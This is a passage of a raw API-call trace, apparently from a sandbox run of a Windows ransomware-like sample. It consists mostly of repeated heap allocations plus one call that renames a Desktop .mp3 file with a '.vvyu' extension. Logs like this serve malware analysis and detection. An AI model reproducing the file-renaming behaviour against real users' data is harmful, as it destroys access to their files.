(hObject=0x510) returned 1 [0200.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0200.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0200.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0200.951] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\XIwrATe.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\yuyi2uqrrieqqvb sfmm\\xiwrate.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\XIwrATe.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\yuyi2uqrrieqqvb sfmm\\xiwrate.mp3.vvyu")) returned 1 [0200.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.952] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf46c50, ftCreationTime.dwHighDateTime=0x1d8a2a0, ftLastAccessTime.dwLowDateTime=0x42b2be80, ftLastAccessTime.dwHighDateTime=0x1d8a565, ftLastWriteTime.dwLowDateTime=0x42b2be80, ftLastWriteTime.dwHighDateTime=0x1d8a565, nFileSizeHigh=0x0, nFileSizeLow=0x32ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XIwrATe.mp3", cAlternateFileName="")) returned 0 [0200.955] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0200.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0200.956] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0200.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0200.956] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0200.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0200.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0200.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 